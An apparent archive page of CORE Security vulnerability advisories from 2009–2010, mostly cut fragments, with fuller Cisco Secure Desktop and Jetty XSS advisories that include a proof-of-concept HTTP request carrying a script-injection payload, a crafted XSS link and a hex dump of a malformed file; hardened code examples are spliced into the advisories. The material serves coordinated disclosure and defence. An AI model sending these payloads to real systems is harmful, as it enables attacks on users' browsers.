[Full-disclosure] CORE-2009-0803: Virtual PC Hypervisor Memory Protection Vulnerability

2010-03-16 Thread CORE Security Technologies Advisories
-vpc-poc.zip


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] CORE-2009-1103: Microsoft Office Excel DbOrParamQry Record Parsing Vulnerability

2010-03-09 Thread CORE Security Technologies Advisories
03-09:
The advisory CORE-2009-1103 is published.



10. *References*

[1] Microsoft Security Bulletin MS10-017
http://www.microsoft.com/technet/security/Bulletin/MS10-017.mspx
[2] MSDN DbOrParamQry entry
http://msdn.microsoft.com/en-us/library/dd953289.aspx


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] CORE-2009-0813: Windows Movie Maker and Microsoft Producer IsValidWMToolsStream() Heap Overflow

2010-03-09 Thread CORE Security Technologies Advisories
ated version of advisory
CORE-2009-0813 as requested by Microsoft.

. 2010-03-09:
Microsoft Security Bulletin MS10-016 [2] is released, which fixes the
vulnerability in Movie Maker.

. 2010-03-09:
The advisory CORE-2009-0813 is published as user release.



10. *References*

[1] About Core Security's Bugweek
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek
[2] Microsoft Security Bulletin MS10-016
http://www.microsoft.com/technet/security/Bulletin/MS10-016.mspx


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] CORRECTION: CORE-2009-0913 - Luxology Modo 401 .LXO Integer Overflow

2010-03-03 Thread CORE Security Technologies Advisories
 52 00-40 00 00 00  or   ?   ?R @
01B0:  47 00 3F 80-00 00 42 00-3F 80 00 00-43 48 4E 4C  G ?Ç  B
?Ç  CHNL
01C0:  00 12 62 75-67 68 65 72-65 00 00 01-70 6E 78 21   ?bughere
?pnx!

- -/



8. *Report Timeline*

. 2009-11-06:
Core completes the support form trying to reach a security contact.

. 2009-11-13:
The Luxology LLC support team does not respond to any mail. Core contacts
CERT trying to reach a valid security contact at Luxology LLC.

. 2009-11-16:
CERT acknowledges the communication, and Core reschedules the advisory to
November 30th, 2009 based on CERT recommendations.

. 2010-03-01:
No response from Luxology LLC.

. 2010-03-02:
The advisory CORE-2009-0913 is published.



9. *References*

[1] The authors participated in Core Bugweek 2009 as members of the
team "Gimbal Lock N Load".
[2] http://www.luxology.com/modo/
[3] http://www.luxology.com/
[4] http://www.martinreddy.net/gfx/2d/IFF.txt


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



[Full-disclosure] Luxology Modo 401 .LXO Integer Overflow

2010-03-02 Thread CORE Security Technologies Advisories
 3F 80-00 00 42 00-3F 80 00 00-43 48 4E 4C  G ?Ç  B
?Ç  CHNL
01C0:  00 12 62 75-67 68 65 72-65 00 00 01-70 6E 78 21   ?bughere
?pnx!

- -/



8. *Report Timeline*

. 2009-11-06:
Core completes the support form trying to reach a security contact.

. 2009-11-13:
The Luxology LLC support team does not respond to any mail. Core contacts
CERT trying to reach a valid security contact at Luxology LLC.

. 2009-11-16:
CERT acknowledges the communication, and Core reschedules the advisory to
November 30th, 2009 based on CERT recommendations.

. 2009-03-01:
No response from Luxology LLC.

. 2009-03-02:
The advisory CORE-2009-0913 is published.



9. *References*

[1] The authors participated in Core Bugweek 2009 as members of the
team "Gimbal Lock N Load".
[2] http://www.luxology.com/modo/
[3] http://www.luxology.com/
[4] http://www.martinreddy.net/gfx/2d/IFF.txt


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://corelabs.coresecurity.com.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




[Full-disclosure] CORE-2009-0827: Microsoft Office Excel / Word OfficeArtSpgr Container Pointer Overwrite Vulnerability

2010-02-09 Thread CORE Security Technologies Advisories
es that the ship date for the vulnerability MSRC 9368 in
MSO.dll is still February 9th 2010 (the spreadsheet contained a clerical
error).

. 2010-02-01:
Core requests from MSRC the list of non-vulnerable versions of Excel /
Office, and a statement for the "vendor information" section of the
advisory.

. 2010-02-03:
Microsoft sends the CVE identifier for the vulnerability, and the list
of affected and non-affected software.

. 2010-02-09:
The advisory CORE-2009-0827 is published.



10. *References*

[1] About Core Security's Bugweek
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek
[2] Microsoft Security Bulletin MS10-003
http://www.microsoft.com/technet/security/bulletin/MS10-003.msp


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



[Full-disclosure] [CORE-2010-0121] Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers

2010-02-05 Thread CORE Security Technologies Advisories
13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



[Full-disclosure] CORE-2009-0625: Internet Explorer Dynamic OBJECT tag and URLMON sniffing vulnerabilities

2010-02-03 Thread Core Security Technologies Advisories
bypass.
http://www.coresecurity.com/content/ie-security-zone-bypass

[3] Understanding and Working in Protected Mode Internet Explorer.
http://msdn.microsoft.com/en-us/library/bb250462(VS.85).aspx

[4] Protected Mode for IE7 in Windows Vista - Is it On or Off?
http://blogs.msdn.com/ie/archive/2007/04/04/protected-mode-for-ie7-in-windows-vista-is-it-on-or-off.aspx

[5] Jorge Luis Alvarez Medina, Abusing Insecure Features of Internet
Explorer, Feb. 2010.
http://corelabs.coresecurity.com/index.php?module=wiki%38action=attachment%38type=publication%38page=Abusing_insecure_features_of_Internet_Explorer-article.pdf

[6] Jorge Luis Alvarez Medina, Internet Explorer turns your personal
computer into a public File Server, BlackHat Technical Security
conference, Feb. 2010, Washington D.C., USA.
http://corelabs.coresecurity.com/index.php?module=wiki%38action=attachment%38type=publication%38page=Abusing_insecure_features_of_Internet_Explorer-BHDC2010-Slides.pdf

[7] Wikipedia, Trident (layout engine).
http://en.wikipedia.org/wiki/Trident_(layout_engine)

[8] Microsoft Security Bulletin MS09-019, Cumulative Security Update for
Internet Explorer, June 10 2009.
http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



[Full-disclosure] [CORE-2009-1126] Corel Paint Shop Pro Photo X2 FPX Heap Overflow

2010-02-01 Thread CORE Security Technologies Advisories
12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



[Full-disclosure] [CORE-2010-0106] Cisco Secure Desktop XSS/JavaScript Injection

2010-02-01 Thread Core Security Technologies Advisories

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

Cisco Secure Desktop XSS/JavaScript Injection



1. *Advisory Information*

Title: Cisco Secure Desktop XSS/JavaScript Injection
Advisory Id: CORE-2010-0106
Advisory URL: http://www.coresecurity.com/content/cisco-secure-desktop-xss
Date published: 2010-02-01
Date of last update: 2010-02-01
Vendors contacted: Cisco
Release mode: Coordinated release



2. *Vulnerability Information*

Class: Cross site scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 37960
CVE Name: CVE-2010-0440



3. *Vulnerability Description*

The Cisco Secure Desktop web application does not sufficiently verify
that a well-formed request was provided by the user who submitted the POST
request, resulting in a cross-site scripting vulnerability.

For the attack to succeed, the Secure Desktop application on the Cisco
appliance must be turned on.


4. *Vulnerable packages*

   . Cisco Secure Desktop 3.4.2048
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . Cisco Secure Desktop 3.5.841


6. *Vendor Information, Solutions and Workarounds*

Cisco Security Alert:
http://tools.cisco.com/security/center/viewAlert.x?alertId=19843


7. *Credits*

This vulnerability was discovered and researched by Matias Pablo Brutti
from Core Security Technologies.

The publication of this advisory was coordinated by Jorge Lucangeli Obes
from Core Security Technologies Advisories Team.


8. *Technical Description / Proof of Concept Code*

Cross-site scripting (XSS) vulnerabilities allow an attacker to execute
arbitrary scripting code in the context of the user's browser (in the
vulnerable application's domain). For example, an attacker could exploit
an XSS vulnerability to steal user cookies (and then impersonate the
legitimate user) or fake a page requesting information from the user
(e.g. credentials). This class of vulnerability occurs when user-supplied
data is displayed without encoding.

The Cisco Secure Desktop web application does not sufficiently verify
that a well-formed request was provided by the user who submitted the POST
request. The cross-site scripting vulnerability was found in the
following URL:

/-
https://{IP}//+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us

- -/
Using the POST variable:

/-
Starting, please wait..."><script>alert(1);</script>

- -/
The content of the POST field is not encoded when it is used in HTML
output, which allows an attacker who controls that content to insert
JavaScript code. Furthermore, JavaScript code could possibly be injected
into the 'start.html' page, because the content of the previously
mentioned POST is used in 'binary/mainv.js' as input to an 'eval()'
call. This allows an attacker to inject any code without restriction,
and it will be executed in the context of the 'eval()' function:

/-
http_request.open('POST', path, false);
http_request.send(msgs);
var trans = new Array();
try {
    eval(http_request.responseText);
} catch (e) {}

- -/
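As an added example (not Cisco's code), the eval()-based loader from the snippet above next to a hardened loader that treats the translation response as JSON data, plus an output-encoding renderer for the HTML context in which the translated text is shown. All function names, the LEGACY_RESPONSE string and the REFLECTED_KEY sample are constructed for this example.

```javascript
// Added example, not Cisco's code: the eval()-based translation loader
// from mainv.js beside a hardened loader and an output-encoding renderer.
// Every name below and both sample strings are constructed for this example.

// Constructed sample in the shape of the advisory's reflected value.
const REFLECTED_KEY = 'Starting, please wait..."><script>alert(1);</script>';

// Constructed copy of the advisory's response body: JavaScript source that
// assigns into the client-side `trans` table.
const LEGACY_RESPONSE =
  'trans["Starting, please wait...\\"><script>alert(1);</script>"] = ' +
  '"Starting, please wait...\\"><script>alert(1);</script>";';

// Unsafe pattern, as in binary/mainv.js: the server returns JavaScript and
// the client executes it. Whatever reaches the response body runs with the
// page's privileges, so the server's quoting is the only line of defence.
function loadTranslationsUnsafe(responseText) {
  var trans = new Array();
  try {
    eval(responseText); // direct eval: assigns into the local `trans`
  } catch (e) {}
  return trans;
}

// Hardened transport: the server returns a JSON object and the client
// parses it as data. JSON.parse never executes code, so quotes,
// backslashes or "</script>" inside a key or value are just characters.
function loadTranslationsSafe(responseText) {
  let parsed;
  try {
    parsed = JSON.parse(responseText);
  } catch (e) {
    return Object.create(null); // not JSON (e.g. legacy JS): no translations
  }
  if (parsed === null || typeof parsed !== "object" || Array.isArray(parsed)) {
    return Object.create(null);
  }
  const trans = Object.create(null); // no inherited keys such as __proto__
  for (const [key, value] of Object.entries(parsed)) {
    if (typeof value === "string") trans[key] = value; // drop non-string values
  }
  return trans;
}

// Output encoding for the HTML context in which the text is displayed.
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Renders a status message. An untranslated key falls back to the key
// itself, which is exactly the attacker-controlled string, so it is encoded too.
function renderStatus(trans, key) {
  const text = Object.prototype.hasOwnProperty.call(trans, key) ? trans[key] : key;
  return '<span class="status">' + htmlEncode(text) + "</span>";
}
```

Feeding LEGACY_RESPONSE to the hardened loader yields no translations at all, which is the point: a response that is code rather than data is rejected instead of executed.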



8.1. *Proof of Concept*



/-
REQUEST:
POST https://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.1
Host: {IP}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://{IP}/CACHE/sdesktop/install/start.htm
Content-Type: application/xml; charset=UTF-8
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 56

Starting, please wait..."><script>alert(1);</script>

RESPONSE:
HTTP/1.1 200 OK
Server: Cisco AWARE 2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Mon, 16 Nov 2009 14:14:07 GMT
Content-Length: 122

trans["Starting, please wait...\"><script>alert(1);</script>"] =
"Starting, please wait...\"><script>alert(1);</script>";

- -/



9. *Report Timeline*

. 2010-01-12:
Vendor contacted.

. 2010-01-12:
Cisco replies, saying that it will investigate the report.

. 2010-01-12:
Cisco tentatively acknowledges the February 5th release date.

. 2010-01-13:
Core replies, reassuring that the release date can be moved if Cisco
can't meet it.

. 2010-01-13:
Cisco updates, pointing to a beta version of Cisco Secure Desktop that
contains a fix for the vulnerability.

. 2010-01-13:
Cisco describes the fix and the non-vulnerable versions of the package.

. 2010-01-14

[Full-disclosure] CORE-2009-1013: Multiple XSS and Injection Vulnerabilities in TestLink Test Management and Execution System

2009-12-09 Thread CORE Security Technologies Advisories
verifiable claim is made that can assure Core of a planned fix
and release.

. 2009-11-27:
Core reschedules its internal publication date for this advisory to
December 14th. This will be the final date and a user-release will be
made, unless TestLink developers share information that can be
verified by Core that shows commitment to eventually looking into said
bugs and fixing them. Core suggests that developers actually in charge
of these issues are copied in the e-mail loop, or that access to
internal issue-tracking tools be given to them to actively participate
in the discussions and the patching process.

. 2009-11-30:
Martin Havlat asks for technical details needed by him to confirm some
of these vulnerabilities.

. 2009-12-01:
Core replies with the technical details needed by Martin Havlat.

. 2009-12-02:
Martin Havlat sends a patched version of TestLink to Core asking for
verification of fixes to some of the vulnerabilities reported in this
advisory.

. 2009-12-03:
Core replies saying that the fixes proposed by Martin Havlat fail to
patch those specific vulnerabilities. The bugs are further researched
by Core and the advisory draft is modified to include a more detailed
explanation of these bugs. This technical information is shared by
Core with Martin Havlat and some insight into possible fixes is also
given.

. 2009-12-09:
TestLink 1.8.5 is released.

. 2009-12-09:
Advisory CORE-2009-1013 is published.


10. *References*

[1] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
[2] http://www.teamst.org/
[3] http://www.owasp.org/index.php/PHP_Top_5


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




[Full-disclosure] CORE-2009-0911: DAZ Studio Arbitrary Command Execution

2009-12-03 Thread CORE Security Technologies Advisories
12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




[Full-disclosure] CORE-2009-0910: Autodesk Maya Script Nodes Arbitrary Command Execution

2009-11-23 Thread CORE Security Technologies Advisories
ated in Core Bugweek 2009 as member of the team
"Gimbal Lock N Load".
[2] http://usa.autodesk.com/adsk/servlet/pc/index?siteID=123112&id=13577897


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




[Full-disclosure] CORE-2009-0909: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution

2009-11-23 Thread CORE Security Technologies Advisories
12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.




[Full-disclosure] CORE-2009-0908: Autodesk SoftImage Scene TOC Arbitrary Command Execution

2009-11-23 Thread CORE Security Technologies Advisories
12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2009-1027: IBM SolidDB invalid error code vulnerability

2009-11-18 Thread CORE Security Technologies Advisories




[Full-disclosure] CORE-2009-0814: HP Openview NNM 7.53 Invalid DB Error Code vulnerability

2009-11-17 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2009-0922: Jetty Persistent XSS in Sample Cookies Application

2009-10-06 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

Jetty Persistent XSS in Sample Cookies Application



1. *Advisory Information*

Title: Jetty Persistent XSS in Sample Cookies Application
Advisory Id: CORE-2009-0922
Advisory URL: http://www.coresecurity.com/content/jetty-persistent-xss
Date published: 2009-10-06
Date of last update: 2009-10-06
Vendors contacted: Jetty Team
Release mode: Coordinated release



2. *Vulnerability Information*

Class: Persistent Cross-site Scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: N/A



3. *Vulnerability Description*

Jetty [1] includes several sample web applications for developers to
learn from. One of them sets cookies with user-supplied data and then
dumps them as HTML. This application does not filter the user-supplied
data when outputting it to the visitor, which constitutes a persistent
XSS vulnerability [2].

This application accepts the cookie content as a GET parameter. This
allows an attacker to trick someone into clicking a handcrafted link
with malicious code as the cookie content, and thus executing that code
in a privileged domain, such as localhost, any domain in the intranet
zone, or a domain where another web application is running. For example,
the following link will result in JavaScript code being executed on the
localhost domain if the victim has deployed a default installation of
Jetty on his workstation:
http://localhost:8080/cookie/?Name=aaa&Value=bbbalert(1)bbbccc&Age=.



4. *Vulnerable packages*

   . Jetty 6.1.19
   . Jetty 6.1.20


5. *Non-vulnerable packages*

   . Jetty 6.1.21
   . Jetty 7.0.0


6. *Vendor Information, Solutions and Workarounds*

A workaround is to disable this particular example on any running
instance of Jetty in a particular workstation. Examples should always be
disabled on production servers, as recommended by the software vendor.


7. *Credits*

This vulnerability was discovered by Aureliano Calvo from Core Security
Technologies during Bugweek 2009 [3].


8. *Technical Description / Proof of Concept Code*

The problem resides in the 'CookieDump.java' file from the examples.

/-
Cookie[] cookies = request.getCookies();

for (int i=0;cookies!=null && i<cookies.length;i++)
{
    out.println("<b>"+cookies[i].getName()+"</b>="+cookies[i].getValue()+"<br/>");
}

- -/
'cookies[i].getValue()' should be filtered (HTML-encoded) before it is
written to the page, to prevent malicious code from being executed.
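As an added example, not Jetty's code and not part of the advisory, the dump loop rewritten with output encoding next to the unencoded version; cookies are modelled as a plain name-to-value map instead of the Servlet API's Cookie objects so the class runs stand-alone, and the sample cookie value is constructed.

```java
import java.util.LinkedHashMap;
import java.util.Map;

/**
 * Added example (not Jetty's code): the CookieDump rendering with and
 * without HTML encoding of the user-controlled cookie name and value.
 * Cookies are modelled as a name->value map so no Servlet API is needed.
 */
public final class CookieDumpEscaping {

    /** Encode the characters that change meaning inside an HTML element body or quoted attribute. */
    static String escapeHtml(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Same shape as the vulnerable sample: raw name and value are concatenated into the markup. */
    static String renderUnsafe(Map<String, String> cookies) {
        StringBuilder out = new StringBuilder();
        for (Map.Entry<String, String> e : cookies.entrySet()) {
            out.append("<b>").append(e.getKey()).append("</b>=")
               .append(e.getValue()).append("<br/>\n");
        }
        return out.toString();
    }

    /** Hardened version: every user-controlled fragment goes through escapeHtml first. */
    static String renderSafe(Map<String, String> cookies) {
        StringBuilder out = new StringBuilder();
        for (Map.Entry<String, String> e : cookies.entrySet()) {
            out.append("<b>").append(escapeHtml(e.getKey())).append("</b>=")
               .append(escapeHtml(e.getValue())).append("<br/>\n");
        }
        return out.toString();
    }

    /** True if the rendered markup still contains a script element that came from cookie data. */
    static boolean containsScriptTag(String html) {
        return html.toLowerCase().contains("<script");
    }

    public static void main(String[] args) {
        // Constructed sample: a cookie value carrying markup, in the spirit of the advisory's PoC link.
        Map<String, String> cookies = new LinkedHashMap<>();
        cookies.put("aaa", "bbb<script>alert(1)</script>ccc");

        String unsafe = renderUnsafe(cookies);   // script element survives intact
        String safe = renderSafe(cookies);       // script element becomes inert text
        System.out.println("unsafe: " + unsafe);
        System.out.println("safe:   " + safe);
        System.out.println("script tag in unsafe output: " + containsScriptTag(unsafe));
        System.out.println("script tag in safe output:   " + containsScriptTag(safe));
    }
}
```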


9. *Report Timeline*

. 2009-09-22:
Core Security Technologies contacts Jan Bartel and Greg Wilkins from
Webtide, notifying them of the existence of an XSS vulnerability in a
sample application. Core sends its PGP key and asks Jan for his, should
he wish to keep future communications encrypted.

. 2009-09-23:
Greg Wilkins asks for technical information about the vulnerability in
plaintext. He also comments that some vulnerabilities have been fixed in
the 6.1.21 and 7.0 releases, and asks Core to verify if the reported
vulnerability has already been fixed in their repositories.

. 2009-09-23:
Technical details are sent by Core, specifying that the Persistent XSS
that was discovered has not been fixed in the repositories pointed to by
Greg. Core asks for a release date for the fixed version of Jetty in
order to release the advisory only when a fixed version is available.

. 2009-09-24:
Greg Wilkins acknowledges the vulnerability and confirms it will be
fixed in release 7.0.0, due in the week of September 28th. A release
date for Jetty 6.1.22 is not yet scheduled. Greg mentions that the
recommended workaround for production servers is not to deploy the
example applications.

. 2009-09-28:
Core reminds Greg that a deadline for the release of this advisory has
been set to Monday October 5th.

. 2009-09-28:
Greg Wilkins agrees with the proposed publication date, since there is a
good workaround.

. 2009-10-06:
The advisory CORE-2009-0922 is published.



10. *References*

[1] http://jetty.mortbay.org/
[2] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
[3] The author participated in Core Bugweek 2009 as member of the team
"Bugged Coffee".



[Full-disclosure] CORE-2009-0820 - Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server

2009-09-09 Thread CORE Security Technologies Advisories
--/

The problem exists because the guard of the first if includes the result
of 'opt = next(&p, end)' as part of the check. If this returns 'NULL',
the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will
dereference the null pointer.


9. *Report Timeline*

. 2009-08-20:
Core Security Technologies notifies Simon Kelley of the vulnerability,
including technical details of the vulnerability in an advisory draft.

. 2009-08-21:
Simon Kelley acknowledges the vulnerability and confirms that he is
working on a patch. He also notes that he is aware that most home router
distributions have TFTP turned off by default, and firewalled, and
suggests this should be mentioned in the advisory. Simon also mentions
that a NULL-pointer dereference bug has been discovered in the same
code, and suggests merging both bugs into the same advisory. Monday 31/08
is accepted as a possible release date for this advisory, and help is
offered in contacting package maintainers of dnsmasq for most operating
systems.

. 2009-08-21:
Core changes the advisory draft to accommodate Simon's suggestions.
About the NULL-pointer dereference, Core mentions the terms it thinks
appropriate for the bug to be merged into this advisory, and details how
this would affect the following procedures, such as asking for a
CVE/Bugtraq ID.

. 2009-08-23:
Simon Kelley contacts Core back, saying that the terms for the
null-pointer dereference bug to be included in the advisory are OK. He
also mentions that the finder of this bug prefers to remain uncredited
in this advisory. He sends details about the new bug so that the
advisory draft can be updated to include it.

. 2009-08-23:
Core asks for proper CVE and Bugtraq ID numbers, specifying it believes
each vulnerability reported in this advisory should be assigned its own.

. 2009-08-23:
Vincent Danen, from Red Hat's Security Response Team, contacts Core in
order to discuss both vulnerabilities over a secure communications
channel, and offers his help in obtaining proper CVE numbers, specifying
that Red Hat also believes a separate number should be assigned to each
vulnerability.

. 2009-08-23:
Core replies to Vincent Danen by sending its GPG key. Core also mentions
that separate CVE numbers have already been requested.

. 2009-08-23:
Core replies to Simon Kelley, including a new advisory draft with both
bugs merged.

. 2009-08-23:
Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends
them to Red Hat and Simon Kelley.

. 2009-08-31:
The advisory CORE-2009-0820 is published.




[Full-disclosure] CORE-2009-0820: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server

2009-08-31 Thread CORE Security Technologies Advisories
 1;
   transfer->block = 0;
 }
 }

- ---/

The problem exists because the guard of the first if includes the
result of 'opt = next(&p, end)' as part of the check. If this returns
'NULL', the guard will fail and in the next if 'strcasecmp(opt,
"tsize")' will dereference the null pointer.


9. *Report Timeline*

. 2009-08-20:
Core Security Technologies notifies Simon Kelley of the vulnerability,
including technical details of the vulnerability in an advisory draft.

. 2009-08-21:
Simon Kelley acknowledges the vulnerability and confirms that he is
working on a patch. He also notes that he is aware that most home router
distributions have TFTP turned off by default, and firewalled, and
suggests this should be mentioned in the advisory. Simon also mentions
that a NULL-pointer dereference bug has been discovered in the same
code, and suggests merging both bugs into the same advisory. Monday
31/08 is accepted as a possible release date for this advisory, and
help is offered in contacting package maintainers of dnsmasq for most
operating systems.

. 2009-08-21:
Core changes the advisory draft to accommodate Simon's suggestions.
About the NULL-pointer dereference, Core mentions the terms it thinks
appropriate for the bug to be merged into this advisory, and details
how this would affect the following procedures, such as asking for a
CVE/Bugtraq ID.

. 2009-08-23:
Simon Kelley contacts Core back, saying that the terms for the
null-pointer dereference bug to be included in the advisory are OK. He
also mentions that the finder of this bug prefers to remain uncredited
in this advisory. He sends details about the new bug so that the
advisory draft can be updated to include it.

. 2009-08-23:
Core asks for proper CVE and Bugtraq ID numbers, specifying it
believes each vulnerability reported in this advisory should be
assigned its own.

. 2009-08-23:
Vincent Danen, from Red Hat's Security Response Team, contacts Core in
order to discuss both vulnerabilities over a secure communications
channel, and offers his help in obtaining proper CVE numbers,
specifying that Red Hat also believes a separate number should be
assigned to each vulnerability.

. 2009-08-23:
Core replies to Vincent Danen by sending its GPG key. Core also
mentions that separate CVE numbers have already been requested.

. 2009-08-23:
Core replies to Simon Kelley, including a new advisory draft with both
bugs merged.

. 2009-08-23:
Core receives proper CVE and Bugtraq ID numbers for both bugs, and
sends them to Red Hat and Simon Kelley.

. 2009-08-31:
The advisory CORE-2009-0820 is published.





[Full-disclosure] CORE-2009-0727: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability

